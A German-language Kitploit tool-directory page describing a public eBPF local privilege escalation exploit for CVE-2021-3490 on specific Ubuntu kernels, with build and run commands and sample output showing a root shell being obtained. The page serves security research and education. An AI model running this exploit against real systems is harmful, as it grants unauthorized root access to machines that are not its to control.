Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/chompie1337/linux_lpe_ebpf_cve-2021-3490
Privilege EscalationSchwachstellenanalyseExploitationLernen & BildungBinary-Exploitation
GitHubchompie1337/linux_lpe_ebpf_cve-2021-3490

Linux_LPE_eBPF_CVE-2021-3490

eBPF-basierter Linux-Kernel-Local-Privilege-Escalation-Exploit, der auf CVE-2021-3490 abzielt. Bietet Root-Shell-Zugriff auf anfällige Ubuntu-Kernel 5.8.0-25 bis 5.11.0-16.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
31748vor 3 JahrenVon Kitploit geprüft

Linux_LPE_eBPF_CVE-2021-3490

LPE-Exploit für CVE-2021-3490. Getestet auf Ubuntu 20.04.02 und 20.10 (Groovy Gorilla) mit Kernel 5.8.0-25.26 bis 5.8.0-52.58. und Ubuntu 21.04 (Hirsute Hippo) mit 5.11.0-16.17. Die Sicherheitslücke wurde von Manfred Paul @_manfp entdeckt und in diesem Commit behoben.

Autor: @chompie1337

Nur für Bildungs-/Forschungszwecke. Nutzung auf eigene Gefahr.

Verwendung:

Zum Bauen für Ubuntu 20.04.02 und Ubuntu 20.10 (Groovy Gorilla):

root@kitploit:~
make groovy

Zum Bauen für Ubuntu 21.04 (Hirsute Hippo):

root@kitploit:~
make hirsute

Zum Ausführen:

root@kitploit:~
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

Hinweis: Du musst die Root-Shell sauber mit exit beenden, um die Bereinigung durchzuführen und einen Kernel-Panic zu vermeiden.

Lies den Writeup Kernel Pwning with eBPF: a Love Story.

Tool herunterladen